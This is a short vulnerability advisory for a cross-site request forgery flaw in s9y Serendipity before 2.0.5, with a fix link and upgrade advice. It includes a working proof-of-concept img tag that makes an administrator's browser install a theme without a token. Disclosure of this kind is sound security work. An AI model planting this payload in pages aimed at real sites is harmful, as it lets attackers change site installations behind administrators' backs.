s9y Serendipity versions prior to 2.0.5 suffer from a cross site request forgery vulnerability.
5e210ab8f2a8599541adda6e8f1c32a12896822aaf6623805ad8f1d68692e912Details
======
Software: s9y Serendipity
Version: <2.0.5
Homepage: https://docs.s9y.org/
=======
Description
================
Get type CSRF in Serendipity allows attacker installs any themes, no token here.
POC:
========
include this in the page ,then attack will occur:
<img src="http://127.0.0.1/serendipity/serendipity_admin.php?serendipity%5BadminModule%5D=templates&serendipity%5BadminAction%5D=install&serendipity%5Btheme%5D=bartleby&serendipity%5Bspartacus_fetch%5D=bartlebya>
Mitigations
=======
update to Serendipity v2.1.x
========
FIX:
==========
https://github.com/s9y/Serendipity/issues/452
Best regards,
Zhiyang Zeng of Tencent security platform department
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed